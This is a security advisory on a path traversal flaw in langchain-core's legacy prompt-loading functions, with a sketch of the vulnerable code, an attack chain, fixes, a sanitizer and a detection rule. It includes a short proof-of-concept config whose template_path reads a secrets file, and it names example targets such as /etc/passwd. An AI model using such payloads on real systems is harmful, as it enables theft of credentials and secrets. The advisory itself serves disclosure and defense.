LangChain Core Path Traversal Vulnerability in Legacy APIs
A path traversal vulnerability in LangChain Core's legacy `load_prompt` functions allows attackers to read arbitrary files by injecting malicious paths into prompt configurations.
Multiple path traversal vulnerabilities have been identified in the langchain-core package, specifically affecting the legacy `load_prompt`, `load_prompt_from_config`, and `.save()` methods. These vulnerabilities stem from a lack of validation on file paths embedded within deserialized configuration dictionaries. An attacker who can influence or control the prompt configuration supplied to these functions can exploit this flaw to read arbitrary files on the host filesystem. The scope is constrained by file extension checks, limiting readable files to `.txt` for templates and `.json` or `.yaml` for examples. This issue impacts applications that accept prompt configurations from untrusted sources, such as low-code AI builders and API wrappers exposing `load_prompt_from_config()`. The vulnerable code resides in `langchain_core/prompts/loading.py`, in the `_load_template()`, `_load_examples()`, and `_load_few_shot_prompt()` functions. This vulnerability is resolved in langchain-core version 1.2.22, and the affected functions are now deprecated.
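To make the flaw concrete, here is an illustrative reconstruction of the `_load_template()` pattern described above. This is a sketch of the vulnerable logic, not the exact upstream source:

```python
from pathlib import Path

def _load_template(var_name: str, config: dict) -> dict:
    """Sketch of the vulnerable pattern: the *_path value from the
    (potentially attacker-controlled) config is read with only a file
    extension check, never confined to a base directory."""
    if f"{var_name}_path" in config:
        template_path = Path(config.pop(f"{var_name}_path"))
        if template_path.suffix == ".txt":
            # "../../secrets.txt" or "/mnt/secrets/api_key.txt" both pass
            config[var_name] = template_path.read_text()
        else:
            raise ValueError(f"Unsupported file extension: {template_path.suffix}")
    return config
```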
Attack Chain
- Attacker identifies an application using the vulnerable `langchain-core` library and the legacy `load_prompt_from_config()` function.
- Attacker crafts a malicious prompt configuration dictionary containing a `template_path`, `suffix_path`, `prefix_path`, `examples`, or `example_prompt_path` key with a path traversal sequence (e.g., `../../etc/passwd`) or an absolute path (e.g., `/etc/passwd`); a concrete sketch follows this list.
- The attacker injects the malicious configuration into the application, potentially via a low-code AI builder or an API endpoint that accepts prompt configurations.
- The application deserializes the malicious configuration dictionary and passes it to `load_prompt_from_config()`.
- `load_prompt_from_config()` calls the relevant vulnerable function (`_load_template()`, `_load_examples()`, or `_load_few_shot_prompt()`) based on the configuration.
- The vulnerable function reads the file specified in the malicious path without proper validation.
- The contents of the file are then incorporated into a prompt object.
- The application, believing the prompt is benign, processes it further, potentially disclosing the file contents to the attacker via an error message, logging, or other output channels.
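Illustrating the crafting and loading steps above, a minimal proof-of-concept sketch follows. The target path is hypothetical; its `.txt` extension satisfies the extension check noted earlier:

```python
from langchain_core.prompts.loading import load_prompt_from_config

# Attacker-supplied configuration, e.g. submitted to an API endpoint or
# a low-code builder that accepts prompt configs.
malicious_config = {
    "_type": "prompt",
    "input_variables": [],
    # Resolved with no base-directory confinement, so traversal
    # sequences (and absolute paths) escape the intended directory.
    "template_path": "../../../mnt/secrets/api_key.txt",
}

# On affected langchain-core versions this reads the target file and
# embeds its contents as the prompt template.
prompt = load_prompt_from_config(malicious_config)
print(prompt.template)  # leaked file contents
```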
Impact
Successful exploitation allows an attacker to read arbitrary files on the system, potentially exposing sensitive information. This includes cloud-mounted secrets (e.g., `/mnt/secrets/api_key.txt`), configuration files (e.g., `requirements.txt`), cloud credentials (e.g., `~/.docker/config.json`), Kubernetes manifests, CI/CD configurations, and application settings. The impact is especially severe in applications that handle sensitive data or operate in cloud environments. While no victim counts are available, any application using a vulnerable langchain-core version is at risk.
Recommendation
- Upgrade `langchain-core` to version 1.2.22 or later to patch CVE-2026-34070.
- Migrate away from the deprecated `load_prompt`, `load_prompt_from_config`, and `.save()` methods in favor of the `dumpd`/`dumps`/`load`/`loads` serialization APIs in `langchain_core.load`; a migration sketch follows this list.
- If you cannot immediately upgrade, sanitize user-supplied prompt configurations to prevent path traversal by rejecting absolute paths and paths containing `..` sequences; a sketch of such a check follows the migration example below.
- Deploy the Sigma rule "LangChain Path Traversal Attempt" to detect exploitation attempts by monitoring process creations involving `python` with path traversal sequences in command-line arguments.
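A minimal sketch of the recommended migration, using the `dumps`/`loads` APIs in `langchain_core.load`, which serialize prompts inline rather than via filesystem paths:

```python
from langchain_core.load import dumps, loads
from langchain_core.prompts import PromptTemplate

prompt = PromptTemplate.from_template("Summarize the following text: {text}")

# Serialize to a JSON string instead of writing a file with .save();
# the payload carries the template inline, never a filesystem path.
serialized = dumps(prompt, pretty=True)

# Round-trip with loads(); unlike load_prompt_from_config(), nothing
# here reads from the host filesystem.
restored = loads(serialized)
assert restored.format(text="hello") == prompt.format(text="hello")
```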
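And a hedged sketch of the interim sanitization: reject absolute paths and anything that resolves outside a trusted base directory. The helper name and base directory are assumptions, not part of langchain-core:

```python
from pathlib import Path

PROMPT_BASE_DIR = Path("/app/prompts").resolve()  # assumed trusted directory
PATH_KEYS = ("template_path", "suffix_path", "prefix_path", "example_prompt_path")

def sanitize_prompt_config(config: dict) -> dict:
    """Hypothetical pre-filter for untrusted prompt configurations."""
    keys = list(PATH_KEYS)
    # "examples" may hold either an inline list or a file path string;
    # only the string form needs the path check.
    if isinstance(config.get("examples"), str):
        keys.append("examples")
    for key in keys:
        value = config.get(key)
        if not isinstance(value, str):
            continue
        if Path(value).is_absolute():
            raise ValueError(f"absolute path not allowed in {key!r}")
        # Resolve '..' segments and symlinks, then require the result
        # to stay inside the trusted base directory (Python 3.9+).
        resolved = (PROMPT_BASE_DIR / value).resolve()
        if not resolved.is_relative_to(PROMPT_BASE_DIR):
            raise ValueError(f"path traversal detected in {key!r}")
        config[key] = str(resolved)
    return config
```

Call this on any externally supplied configuration before handing it to `load_prompt_from_config()`.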
Detection coverage
LangChain Path Traversal Attempt (severity: high)
Detects potential path traversal attempts in LangChain applications by monitoring process creations with 'python' and path traversal sequences in the command line.